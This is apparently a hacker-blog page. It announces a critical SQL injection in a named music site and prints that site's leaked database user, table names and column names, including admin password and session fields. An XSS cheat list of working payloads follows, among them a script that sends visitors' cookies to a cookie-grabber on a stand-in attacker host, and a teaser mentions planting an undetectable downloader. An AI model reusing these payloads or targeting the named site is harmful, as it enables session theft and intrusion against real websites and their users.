Security Researcher $@T0R! has reported another Critical SQL Injection in singforyou.net

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed  and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.

This is critical and reported to webmaster:

These are some info and screenshots from vul site:

community:sing4u_sing4u@localhostsing4u_sing4u”

Table Name:
“admin,ads_data,artists,banned_ip,category,channel_comments,cometchat, cometchat_status, config,contacts, contacts_block,contests,countrycodes,downloads_log,editors_picks, email_settings,flagged_videos, flvplayer_player_config,flvplayer_player_playlists,flvplayer_player_styles, flvplayer_player_videos_list, group_invitations,group_members,group_po”

Columns Name:
“admin_id,username,password,session,ad_id,ad_name,ad_code,ad_placement, ad_category,ad_status, ad_impressions,date_added,artist_id,name,image,active,ip,comment,categoryid, category_name, category_description,date_added,category_thumb,comment_id,comment, username,channel_user, date_added,id,from,to,message,sent,read,userid,message,status,configid,”

We hope that your security staff will look into this issue and fix it as soon as possible.

Explore More

XSS Cheat List

<script>alert(1);</script> <script>alert('XSS');</script> <script src="http://www.evilsite.org/cookiegrabber.php"></script> <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script> <scr<script>ipt>alert('XSS');</scr</script>ipt> <script>alert(String.fromCharCode(88,83,83))</script> <img src=foo.png onerror=alert(/xssed/) /> <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?> <marquee><script>alert('XSS')</script></marquee> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> "><script>alert(0)</script> <script src=http://yoursite.com/your_files.js></script> </title><script>alert(/xss/)</script> </textarea><script>alert(/xss/)</script>

Infection via HTML

Edit the code on what and how you need it, and yes this is detectable  in many cases, but you could insert a small FUD downloader to be  downloaded via

Hacking with Google, Is it Possible

Hacking with Google, Is it Possible Every hacker needs to develop his abilities if he wants to maintain up to date. That’s why he will use every tool he can